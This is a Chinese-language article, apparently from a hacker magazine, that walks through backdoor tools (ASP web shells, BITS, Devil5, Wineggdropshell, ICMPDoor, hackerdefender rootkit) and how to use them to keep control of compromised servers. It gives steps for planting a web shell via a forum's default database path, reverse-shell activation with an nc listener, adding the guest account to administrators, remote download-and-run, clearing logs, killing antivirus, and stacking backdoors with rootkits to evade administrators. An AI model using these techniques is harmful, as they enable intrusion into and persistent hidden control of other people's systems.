什么是后门程序
后门程序又称特洛伊木马,其用途在于潜伏在电脑中,从事搜集信息或便于黑客进入的动作。后程序和电脑病毒最大的差别,在于后门程序不一定有自我复制的动作,也就是后门程序不一定会“感染”其他电脑。
后门是一种登录系统的方法,它不仅绕过系统已有的安全设置,而且还能挫败系统上各种增强的安全设置。
后门是一种登录系统的方法,它不仅绕过系统已有的安全设置,而且还能挫败系统上各种增强的安全设置。
后门包括从简单到奇特,有很多的类型。简单的后门可能只是建立一个新的账号,或者接管一个很少使用的账号;复杂的后门(包括木马)可能会绕过系统的安全认证而对系统有安全存取权。例如一个login程序,你当输入特定的密码时,你就能以管理员的权限来存取系统。
后门能相互关联,而且这个技术被许多黑客所使用。例如,黑客可能使用密码破解一个或多个账号密码,黑客可能会建立一个或多个账号。一个黑客可以存取这个系统,黑客可能使用一些技术或利用系统的某个漏洞来提升权限。黑客可能使用一些技术或利用系统的某个漏洞庭湖来提升权限。黑客可能会对系统的配置文件进行小部分的修改,以降低系统的防卫性能。也可能会安装一个木马程序,使系统打开一个安全漏洞,以利于黑客完全掌握系统。
以上是在网络上常见的对“后门”的解释,其实我们可以用很简单的一句话来概括它:后门就是留在计算机系统中,供某位特殊使用都通过某种特殊方式控制计算机系统的途径!——很显然,掌握好后门技术是每个网络安全爱好者不可或缺的一项基本技能!它能让你牢牢抓住肉鸡,让它永远飞不出你的五指山!
下文将以笔者从事网络安全多年的工作经验为基础,给广大的网络初级安全爱好者讲解一些网络上常用的后门的种类和使用方法以及技巧,希望大家能在最短的时间内学习到最好的技术,提升自己的网络安全技术水平!
后门的分类
后门可以按照很多方式来分类,标准不同自然分类就不同,为了便于大家理解,我们从技术方面来考虑后门程序的分类方法:
1.网页后门
此类后门程序一般都是服务器上正常的web服务来构造自己的连接方式,比如现在非常流行的asp、cgi脚本后门等。
2。线程插入后门
利用系统自身的某个服务或者线程,将后门程序插入到其中,具体原理原来《黑客防线》曾具体讲解过,感兴趣的朋友可以查阅。这也是现在最流行的一个后门技术。
3扩展后门
所谓的“扩展”,是指在功能上有大的提升,比普通的单一功能的后门有很强的使用性,这种后门本身就相当于一个小的安全工具包,能实现非常多的常驻见安全功能,适合新手使用————但是,功能越强,个人觉得反而脱郭后门“隐蔽”的初衷,具体看法就看各位使用都的喜好了。
4.c/s后门
和传统的木马程序类似的控制方法,采用“客记端/服务端”的控制方式,通过某种特定的访问方式来启动后门进而控制服务器。
5.rootkit
这个需要单独说明,其实把它单独列一个类在这里是不太恰当的,但是,rootkit的出现大大改变了后门程序的思维角度和使用理念,可以说一个好的rootkit就是一个完全的系统杀手!后文我们讲涉及到这方面,想念一定不会让大家失望!
上面是按照技术做的分类,除了这些方面,正向连接后门、反向连接后门等分类也是很常见的,其实如何分类是编程者考虑的事,广大的使用者就不用考虑那么多了,我们看重的,只是功能!
入侵法定————精品后门
上面的“废话”想念大家都看累了吧?好,下面我们来看看现在网络中浒的后门究竟长什么模样想学习网络安全并想提高的朋友看清楚了哦,这可是让你的肉鸡逃不出你的五指山的大好途径!
1.网页后门
近段时间网络上针对系统漏洞的攻击事件渐渐少了,因为大家在认识到网络安全的重要性之后,最简单却又最有效的防护办法:升级,都被大家所认同,所以系统漏洞在以后的岁月中存活的周期会越来越短,而从最近的趋势来看,肢本漏洞已经渐渐取代了系统漏洞的地位,非常多的人开始研究起却本漏洞来,sql注入也开始成为各大安全站点首要关注热点,而说到脚本、网页后门当然就是不得不说的重头戏了,现在国内入侵的主流趋势是先利用某种脚本漏洞上传脚本后门,然后浏览服务器内安装和程序,找到提升权限的突破口,进而拿到服务器的系统权限。
现在asp、CGI、PHP这三个脚本大类在网络上的普遍运用带来了脚本后门在这三方面的发展,下面我们一一道来:
海阳顶端ASP木马
这是ASP脚本方面流传非常广的一个脚本后门了,在经过几次大的改革后,推出了“海阳顶端ASP木马XP版”、“海阳顶端ASP木马红粉佳人版”等功能强大、使用方便的后门,想念经常接解脚步本安全的朋友对这些都不会陌生。
类型:网页木马
使用范围:支持ASP、WEB访问
隐蔽程序:★★★★☆
使用难度:★☆☆☆☆
危害程序:★★★☆☆
查杀难度:★★★☆☆
现在的服务器系统配置都相对安全,公开的系统漏洞存在的机会很少,于是脚本方面的漏洞就开始火起来。首先我们通过某种途径获得一个服务器的页面权限(比如利用论坛上传达室类型未严格设置、SQL注入后获得ASP系统的上传权限、对已知物理路径的服务器上传特定程序),然后我们可以通过简单的上传ASP程序或者是直接复制海阳项端的代码,然后通过WEB访问这个程序,就能很方便地查阅服务器上的资料了,下面举个简单的便子(由于只是简单的介绍,下文便子不会太难或者太普遍,希望大家理解)。
运用举便
leadbbs2.77曾经风靡网络,它是个很典型的ASP论坛,屏蔽了很多可以SQL注入的寺方,但是很多傻瓜级别的网络管理员总是喜欢默认安装,然后启用论坛,我们只需要很简单地在IE中输入:WWW。***。COM/BBS/DATA/LEADBBS。MDB就能够直接下载该论坛的数据库了,而且没有MD5加密哦!,我们直接找到管理员的账户和密码,然后登录论坛,到管理界面将论坛的“联系我们”、“帮助”等ASP文件替换成我们的海阳项端代码,然后执行GUEST权限的CMD命令,方便的上传/下载将定程序、远程执行程序等,这样一个隐藏的后门就建好了!取得服务器的SYSTEM权限就看大家自己的办法了。
一般来讲,海洋的功能是非常强大的,而且不容易被查杀(一个朋友采取的方式是:先利用某个脚本漏洞上传网页后门,再通过海洋上传另一个后门到隐蔽的路径,然后通过最后上传的后门来删除第一次上传的海洋,这样后门的存放路径就可以放得非常深了,普通管理员是很难发现的),如果管理员觉得自己可能中了这里边样的后门,可以利用论坛备份来恢复自己的页面系统,再配合系统日志、论坛日志等程序检查系统,发现可疑ASP文件打开看看海洋是很好识别的,再删除就可以了。
脚本方面的后门还有CGI和PHP两面三刀大类,使用原理都差不多,这里就不再多介绍,在黑防论坛也收录了这三种后门,大家可以下载后自己研究。
2.线程插入后门
首先我们来简单解释一下什么是典型的"线程插入"后门:这种后门在运行时没有进程,所有网络操作均播入到其他应用程序的进程中完成。也就是说,即使受控制端安装的防火墙拥有“应用程序访问权限”的功能,也不能对这样的后门进行有效的警告和拦截,也就使对方的防火墙形同虚设了!这种后门是现在非常主流的一种,很让防护的人头疼,因为对它的查杀比较困难,这种后门本身的功能比较强大,是“居中家旅行、入侵攻击”的必备品哦!
这类的典范就是国内提倡网络共享的小榕的BITS了,从它的推出以来,各类安全工具下载园地里BITS就高居榜首,非常多的朋友使用它的过程中感到了方便。
BITS
类型:系统后门
使用范围:wind200/xp/2003
隐蔽程序:★★★★☆
使用难度:★★★☆☆
危害程序:★★★★☆
查杀难度:★★★★☆
BITS其实是BackgroundIntelligentTransferServicer的缩写,可以在不知不觉中实现另一种意义的典型的线程插入后门,有以下特点:进程管理器中看不到;平时没有端口,只是在系统中充当卧底的角色;提供正向连接和反向连接两种功能;仅适合用于windows200/xp/2003。
运用举例
首先我们用3389登录上肉鸡,确定你有SYSTEM的权限,将BITS.DLL拷贝到服务器上,执行CMD命令:
rundll32.exebits.dll,install
这样就激活了BIST,程序用这个特征的字符来辨认使用者,也就相当于你的密码了,然后卸载:rundll32.exeBITS.dll,Uninstall
这是最简单的使用,这个后门除了隐蔽性好外,还有两大特点是非常值得借鉴的:端口复用和正反向连接。虽然很多朋友经常听到这两个名词,但并不了解它们,端口复用就是利用系统正常的TCP端口通讯和控制,比如80、139等,这样的后门有个非常大的好处就是非常隐蔽,不用自己开端口也不会暴露自己的访问,因为通讯本身就是系统的正常访问!另一个是反向连接,这个很常见,也是后门中一个经典思路,因为从服务器上主动方问外边是不被禁止的,很多很历害的防火墙就怕这点!
BITS的正向连接很简单,大家可以参考它的README,这种方式在服务器没有防火墙等措施的时候很管用,可以方便地连接,但是遇到有防火墙这样的方式就不灵了,得使用下面的反向连接方式:
在本地使用NC监听(如:nc-l-p1234)
用NC连接目标主机的任何一个防火墙允许的TCP端口(80/139/445……)
输入激活命令:hkfx@dancewithdolphin[rxell]:1.1.1.1:2222
目标主机的CMD将会出现NC监听的端口2222,这样就实现了绕过防火墙的功能了。
devil5(魔鬼5号)
类型:系统后门
使用范围:win200/xp/2003
隐蔽程度:★★★★☆
使用难度:★★☆☆☆
危害程序:★★★★☆
查杀难度:★★★☆☆
同BITS一样,Devil5也是线程插入式的后门,和BITS不同的是它可以很方便的在GUI界面下按照自己的使用习惯定制端口和需要插入的线程,适合对系统有一定了解的使用都使用,由于是自定义插入线程,所以它更难被查杀,下面我们来看看它的使用。
运用举例:
道德使用它自带的配置程序EDITDEVIL5.EXE对后门进行常规的配置,包括控制端口、插入线程、连接密码、时间间隔等方面关键点是对插入线程的定制,一般设置成系统自带的SVCHOST,然后运行后门就可以控制了。
我们用TELNET连接上去,连接的格式是:TELNET***定制的端口,它和其他后门不同之处在于连接后没有提示的界面,每次执行程序也是分开的,必须要每次都有输入密码,比如我们丢掉了服务器和管账户,可以激活GUEST后再将GUEST加到管理员权限,记得每次执行命令后加上“>密码”就可以了:netlocalgroupadministratorsguest/add>hkfx,然后你又可以控制服务器了。
很明显示,同榕哥的BITS相比,DEVIL5有一些缺陷:不能通过系统自带端口通讯、执行命令比较麻烦,需要每次输入密码而且不回显示输入内容,很容易出错。但是,它有自己的优势:插入线程可以自已定制,比如设置IE的线程为插入的目标就比较难被查杀:自己提供了专门的查杀工具DELDEVIL5.exe,帮助防护者清理系统;而且它可以任意改名和绑定,使用灵活性上比BITS强……大家选择哪能款就看自己的喜好了。
另外,PortLessBackDoor等工具也是此类的后门,功能强大,隐蔽性稍差,大家有兴趣可以自己研究一下。
3.扩展后门
所谓的扩展后门,在普通意义上理解,可以看成是将非常多的功能集成到了后门里,让后门本身就可以实现很多功能,方便直接控制肉鸡或者服务器,这类的后门非常受初学者的喜爱,通常集成了文件上传/下载、系统用户检测、HTTP访问、终端安装、端口开放、启动/停止服务等功能,本身就是个小的工具包,功能强大。
Wineggdroupshell
类型:系统后门
使用范围:win2000/xp/2003
隐蔽程度:★★★★☆
使用难度:★★☆☆☆
危害程度:★★★★☆
查杀难度:★★★★☆
这个后门是扩展后门中很有代表性的一个,功能这全面让人叹为观止,它能实现如下比较有特色的功能:进程管理,可查看,杀进程(支持用进程名或PID来杀进程);注册表管现(查看,删除,增加等功能);服务管理(停止,启动,枚举,配置,删除服务等功能)端口到程序关联功能(fport);系统重启,关电源,注销等功能(reboot,poweroff,shutdown,logoff);嗅探密码功能;安装终端,修改终端端口功能;端口重定向功能(多线程,并且可限制连接者IP);HTTP服务功能(多线程,并且可限制连接者IP);Socd5代理功能(支持两种不同方式验证,可限制连接者IP);克隆账号,检测克隆账户功能(clone,checkclone);加强了的Findpassword功能(可以得到所有登录用户,包括使用克隆账户远程登录用户密码);HTTP代理(完全匿名,支持oicq、msn、mirc等程序);其他辅助功能,http下载,删除日志,系统信息,恢复常用关联,枚举系统账户等。
当网络上刚推出这个后门的时候,非常多的人用它来替换自己原来使用的后门,一时间各处赞扬之声迭起,但多为一些普通的打捞手的心声,其实它和“后门”的原始定义是有出入的:一旦你需要实现越多的功能,那你的程序在执行、隐藏、稳定等方面就需要考虑非常多的问题,一个疏忽就会导致全盘皆败,所以不建议将此后门用在需要非常隐蔽的地方。
运用举例
在安装后门前,需要使用它自带的EditServer.exe程序对服务端进行非常详细的配置,从10个具体配置中,包括了插入线程、密码、IP登录邮件通告等方面,不难看出它的功能是非常强大的,隐蔽性也很强,下面说几个在入侵中常用的功能,相信经常玩入侵的朋友一定能发现它的强大之处:
Fport:列出进程到端口的列表,用于发现系统中运行程序所对应的端口,可以用来检测常见的隐蔽的后门。
Reboot:重启系统,如果你上传并运行了其他后门程序,并需要重启机器以便让后门正常工作,那使用这个命令吧!
Shell:得到一个DosShell,这个不多讲了,直接得到服务器或者肉鸡上的cmdshell。
PskillPID或程序名:用于杀掉特定的服务,比如杀毒软件或者是防火墙。
Execute程序:在后台中执行程序,比如sniffer等。http://ip/文件名保存文件名:下载程序,直接从网上down一个后门到服务器上。
Installterm端口:在没有安装终端服务的win2k服务版的系统中安装终端服务,重启系统后才生效,并可以自定义连接端口,比如不用3389而用其他端口。
StopService/StartService:停止或者启动某个系统服务,比如telnet。
CleanEvent:删除系统日志。
Redirect:TCP数据转发,这个功能是后门程序中非常出色的一个功能,可以通过某一端口的数据转发来控制内网的机器,在渗透入侵的时候非常管用!
EnumService:列举所有自动启动的服务的资料,比如后门、木马。
RegEdit:进入注册表操作模式,熟悉注册表的使用者终于在后门中找到了福音!
Findpassword:得到所有登录用户密码,比我们常用的findpass功能可强多了。
……
总体来讲,Wineggdropshell是后门程序中很出彩的一个,它经过作者几次大规模的修改和升级,已经趋于稳定,功能的强大当然没得说,但是由于功能太强大,被查杀和怀疑是难以避免的,所以很多人在使用Wineggdropshell一段时间后就发现肉鸡飞了,其实是很正常的事,我你出不用气馁,其实用很简单的方法就可以很好地提高它的隐蔽性,下文将有说明。
相对于Wineggdropshell来说,独孤剑客的winshell在功能上就不那么全面了,但是笔者推荐新手更多的使用winshell而不是Wineggdropshell,因为winshell功能除了获得一个shell以外,只加入了一些重启、关闭服务器的命令,功能相对简单,但完全使用系统自带的cmd来执行命令,对系统学习和掌握也是非常有帮助的!
Winshell和wolf这两者都是国内早期顶尖的后门程序,程序的编制无疑是非常经典的,新手学习时使用这两款后门一定能让你明白很多系统相关东西,了解很多入侵思路和方法。
C/S后门
传统的木马程序常常使用C/S构架,这样的构架很方便控制,也在一定程度上避免了“万能密码”的情况出现,对后门私有化有一定的贡献,这方面分类比较模糊,很多后门可以归结到此类中,比如较巧妙的就是ICMPDoor了
ICMPDoor
类型:系统后门
使用范围:win2000/xp/2003
隐蔽程度:★★★★★
使用难度:★★★☆☆
危害程度:★★★★☆
查杀难度:★★★★★
这个后门利用ICMP通道进行通信,所以不开任何端口,只是利用系统本身的ICMP包进行控制安装成系统服务后,开机自动运行,可以穿透很多防火墙——很明显可以看出它的最大特点:不开任何端口~只通过ICMP控制!和上面任何一款后门程序相比,它的控制方式是很特殊的,连80端口都不用开放,不得不佩服务程序编制都在这方面独特的思维角度和眼光!
运用举例
这个后门其实用途最广的地方在于突破网关后对内网计算机的控制,因为很多机密数据都是放在内网计算机上的,而控制内网计算机并不是我们想到位的商业网络进行入侵检测,它的网络内部并不像我们常见的内网那样非常容易入侵和控制,因为该公司本身涉及到一些网络安全的服务,所以内网个人计算机的防护是很到位的,在尝试过很多后门后,最后ICMPDoor帮我实现了成功的渗透内网!由此笔者开始爱上这个后门。
首先使用icmpsrv.exe-install参数进行后门的安装,再使用icmpsend.exeIP进行控制,可以用:[http://xxx.xxx.xxx/admin.exep;-hkfx.exe]方式下载文件,保存在\\system32\目录下,文件名为hkfx.exe,程序名前的“-”不能省去,使用[pslist]还可以列出远程主机的进程名称和pid,再使用[pskillid]就可以杀进程了,同样,输入普通cmd命令,则远程主机也就执行了相关的命令。
这个后门是采用的c/s构架,必须要使用icmpsend才能激活服务器,但是他也有自己的先天不足:后门依靠ICMP进行通讯,现在的网络,经过冲击波的洗礼后,很少有服务器还接受ICMP包了,很多都屏蔽掉了它,所以用它来控制服务器不是一个好办法,这也是我为什么用它来控制内网计算机的原因了——内网很少有人屏蔽ICMP包吧?!
5.rootkit
如果说上面的后门程序都各有千秋、各有所长的话,它们和经典的rootkit一比简直就是小巫见大巫了,那究竟什么样是rootkit呢?
rootkit出现于20世纪90年代初,在1994年2月的一篇安全咨询报告中首先使用了rootkit这个名词。从出现至今,rootkit的技术发展非常迅速,应用越来越广泛,检测难度也越来越大。其中钍对SunOS和Linux两种操作系统的rootkit最多。
很多人有一个误解,他们认为rootkit是用作获得系统root访问权限的工具。实际上,rootkit是攻击都用来隐蔽自己的踪迹和保留root访问权限的工具。通常,攻击者通过远程攻击获得root访问权限,进入系统后,攻击者会在侵入的主机中安装rootkit,然后他将经常通过rootkit的后门检查系统是否有其他的用户登录,如果只有自己,攻击者就开始着手清理日志中的有关信息。通过rootkit的嗅探器获得其他系统的用户和密码之后,攻击者就会利用这些信息侵入其他系统。
从*nix系统上迁移到windows系统下的rootkit完全沿袭了这些“可怕”的功能!现在网络上常见的rootkit是内核级后门软件,用户可以通过它隐藏文件、进程、系统服、系统驱动、注册表键和键值、打开的端口以及虚构可用磁盘窨。程序同时也在内存中伪装它所做的改动,并且隐身地控制被隐藏进程。程序安装隐藏后门,注册隐藏系统服务并且安装系统驱动。该后门技术允许植入redirector,是非常难以查杀的一个东东,让很多网络管员非常头疼!
hackerdefender
类型:系统后门
使用范围:win200/xp/2003
隐蔽程度:★★★★★
使用难度:★★★★★
危害程度:★★★★★
查杀难度:★★★★★(呵呵,全部五星,因为它太“霸道”了)
现在最新版本的hxdf是1.0.0,它是从国外传过来的一个程序,包含两个关键程序,里面的配置文件ini非常复杂,相信新手使用也是很困难的主要包括:[HiddenTable],[RootProcesses],[HiddenServices],[HiddenRegKeys],[HiddenRegvalues],[StartupRun],[FreeSpace],[HiddenpORTS],[Settings]。对功能就是隐藏文件(目录)、隐藏进程、隐蔽服务、隐藏注册键、隐藏注册表键值、启动程序、增加磁盘剩余空间、隐藏端口、后门设置,具体配置我们就不具体讲解了,本期文章有详细的介绍,我们说说它的特点(纯粹个人观点和经验偏激的地方请大家海涵):
(1)可以实现正常系统TCP端口的通讯,比如80等,这个功能在高级后门并不鲜见。
(2)能得到简单的系统SHELL,对入侵的老手来说这就够了,多余的功能反而是累赘。
(3)隐藏端口,如果你非要使用TCP的某一个非常规端口通讯,那使用这个功能吧,放心,别人发现不了。
(4)隐藏后门的所有可找到东西!这个只能用一个字来形容:牛!比如隐藏文件、服务、注册表键等功能,虽然我们说起来是一句话,想念识货的朋友应该能发现这中间NB的地方!
(5)史上最经典后门思维:配合其他扩展型后门使用,效果好得出乎你的意料!(这是后面的内容,我们马上讲到)。
抛开其他不讲,系统中安装了这样的rootkit,你通过普通的查杀途径根本检测不到这个程序这点就非常值得我们利用了!试想:一个在你服务器上运行的后门,你连看都看不到它,别说查杀了!
注:由于此后门危害太大,所以编辑特别在此掐掉作者一段篇幅,喜欢研究后门程序的朋友可以自己去研究,不过千万注意不要误运行了程序,查杀和清除是非常麻烦的事!直接重新安装系统吧!
经典后门思维
现在很多朋友都在尝试着开发一些自己的后门程序,他们企图将非常多的功能加入到后门里恨不得一个后门就是一个操作系统!————很明显,这样是不对的!因为一个好的后门能实现非常单一的功能就够了,它不是给你控制服务器的,而是给你在丢掉服务器控制方法的时候用来再次控制服务器的!所以,不要经常使用后门程序,当然也不要让你的后门程序太在。
所有网络安全工具都存在一个问题:隐藏!现在随着广大网友安全意识的提高,杀毒软件、系统安全保护程序这些东西再不是“珍品”了,所以,就算你的后门程序能实现两万个功能,但是很容易就被杀毒软件查杀的话,那也是白搭!换句话说:如果别人能很方便地看看进程、查查注册表、看看端口就能查出系统有问题的话,你这个后门也就算不上好了!所以记住:隐藏才是最重要的!
很多朋友都喜欢使用某个功能很强大的后门程序来控制服务器,虽然很隐蔽,但一旦被杀,那他就只有望着服务哭了,其实只要我们稍微入宽思路就能解决这样问题:嵌套使用互补的后门程序!这样一旦一个后门暴露,另一个后门或者几个后门依然在服务器——这点说起来很简单,里面涉及到很多入侵中的经验和方法,也涉入到rootkit,后文我们会讲到。
对现在的网络来说,如果一个网络安全工具被公布,那么,在很短的时间内这个程序将被安全爱好者传到网络的任何一个地主!很明显,这样程序的存活期很短,不出几天就被查杀了,所以本文列举的所有程序都可以在网络上找到(光盘上也有收录),只是给大家提供一种比较好的思路和介绍,很多的后门是私人使用的。希望大家通过自己的学习也能写出自己的优秀后门!
通过上面的讲解,相信大家对现在主流的后门程序都有了一事实上程度的了解,由于篇幅关系,本文不可以一个接一个实际的去讲解用法和查杀,相信那样读者也读着无聊,编辑审稿后也不能刊登了,具体的使用方法还得靠各位去摸索,下面我们说说经典后门的几个个人体会。
首先拍拍wtf的马屁:这小子上次在黑防攻防实验室上说的那句话:“兄弟们千万不要拘泥于思维的定式,要知道安全最重要的就是思维的锻炼和意识的培养,为了锻炼大家的思维能力,友情提醒一下大家,我们在关卡中有很多的陷阱哦!千万不要被表面的现象迷惑了!”不要小看了这句话,把这句话放到网络入分和攻击中,很多思维被发散出来,那是整体层次的提高!就拿我们的后门这方面来讲,同样是上面几个功能强大的、隐蔽性好的后门,为什么你装在肉鸡上,不出三天就被查杀了?而别人装一就一直用得好好的呢?这其中其实就是思维转换的重要性的体现,下面我们将具体说说后门程序如何才能做的好的思维转换和特点利用,先来看看普通网友的误区:
(1)普通安全爱好者都能通过常见的系统漏洞或者其他途径入侵服务器,然后上去就是新建一个账户,直接添加到管理员权限,有点意识的还能在账户后面加一个$让别人在CMD无法发现,然后再通过什么3389、23控制服务器,汗!这就是你看《黑客防线》的成绩?《黑客防线》就这样教你?难道所有管理员都是白痴?都不知道检查系统最重要的账户?这样的肉鸡1天之内不丢都是个奇迹!
(2)控制服务器->上传后门_>开放特定端口->利用后门控制服务器,这中间通过findpass之类的经典工具得到管理员的密码,给服务器开放3389等服务……同样送给这样的朋友一个字:晕!一个简单得不能再简单的netstat-an就能让你的连接暴露无疑!那时候等着上法庭吧!
(3)克隆系统内置账户并使用它来登录服务器,这同样是一个不可取的方法,根据我的经验,这样的肉鸡肯定用不长!一两面三刀周就飞掉了!
…………
上面只是一些比较低端的错误,相信大家在看了此文后不会现再犯这样的错误,下面我们说说觉的比较安全的入侵后控制肉鸡的办法,如果我今天讲的东西能有两、三句能让你在以后的入侵和安全防护中记住,那我倍感欣慰了!
普通的入侵过程中,3389当然是大家最喜欢的控制方式,那为什么就只用3389来单纯控制服务吕呢?当别人关掉3389后你怎么控制呢?所以需要后门,那安装上普通的经典后门,为什么我的肉鸡还是在很短的时间内飞掉呢?——请注意:任何一个系统管理员都不是白痴!不管你多“黑”,你远程控制服务器总没有别人物理接触来得方便吧!逼不得已人家拔掉网线、格式化硬盘总能让你不能控制了吧?!所以,后门的隐蔽性是非常重要的,要让管理员无法发现系统中有后门就是非常重要的了!
一个好的后门,能实现单一的功能就行了,一定不要经常使用你的后门程序来控制肉鸡,这样你想肉鸡不飞都困难,比较好的方法是:
3389/23+扩展型后门+rootkit
这是到目前为止最经典的一种后门搭配方式,它几方面的优点显示而易见:对方发现不明ip连接的时候肯定会检查系统问题,改system密码,清理账户是不可避免了,进而管理员对系统的漏洞进行一次常规升级和检测,补上最开始被入我们入侵的漏洞,这样如果没有后门,再进来就很难了。
通常这样情况下管理员会考虑系统中是不是存在后门,使用常见的杀毒软件,安全程序来检测系统,发现后门立即查杀,所以在这里后门的隐蔽性非常重要,一时被杀,gameover!所以这里定要选择一些比较难查杀或者是加过壳的后门,上面介绍的后门就是不错的选择,线程插入式是比较难被杀掉的。
在这样基础上,如果他发现系统中某个程序总是在对网络连接,或者是某个端口总是有人连接在上面,管理员肯定会想办法kill掉这个程序,所以普通后门再隐藏得好也是会被查杀的,这也是大多数朋友的疑惑了,在这里就需要使用rootkit了!
如果从系统级隐藏掉服务名、进、端口、注册表值、启动项目、程序名,那现在想信普通的杀毒程序、安全工具要查出系统中的后门程序是很难的!而这点,才是后门程序的精华所在:隐藏!这样的功能,绝对不是某个后门程序单一使用能实现!而rootkit和上面介绍的一系列后门中的精品就是你最好的选择!多尝试,想念你一定找到这个经典搭配中的优势的!退一万步讲,如果这样控制的肉鸡飞掉了,奉劝大家还是少玩为妙,免得惹火上身哦!